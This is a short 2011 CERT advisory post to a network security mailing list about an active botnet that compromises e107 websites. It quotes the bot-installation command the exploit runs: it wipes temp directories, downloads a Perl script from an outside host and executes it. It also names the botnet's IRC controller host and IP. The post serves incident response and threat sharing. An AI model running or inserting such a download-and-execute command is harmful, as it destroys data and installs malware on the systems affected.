[nsp-sec] active casper RFI botnet c&c: 194.44.194.131
Marius Urkis
marius at litnet.lt
Mon Jan 3 10:40:38 EST 2011
Hello,
There is an active botnet dedicated mainly to compromise vulnerable e107
based web sites. Bots use search engines to find vulnerable sites and
the exploit results in executing the following code to run a bot:
"cd /var/tmp;cd /tmp;rm -fr *;lwp-download http://linuxcostablanca.com
/date/sbn.txt -O sbn.txt;curl -O http://linuxcostablanca.com
/date/sbn.txt -O sbn.txt;http://linuxcostablanca.com/date/sbn.txt -O
sbn.txt;perl sbn.txt"
Botnet controller sits at oxyde.ath.cx, 194.44.194.131, TCP/6667
3255 | 194.44.194.131 | UARNET-AS Ukrainian Academic and Research
Network
Cheers
--
Marius
=============================
Marius Urkis
LITNET CERT
http://cert.litnet.lt
Tel: +370 37 300645
GSM: +370 687 79059
More information about the nsp-security
mailing list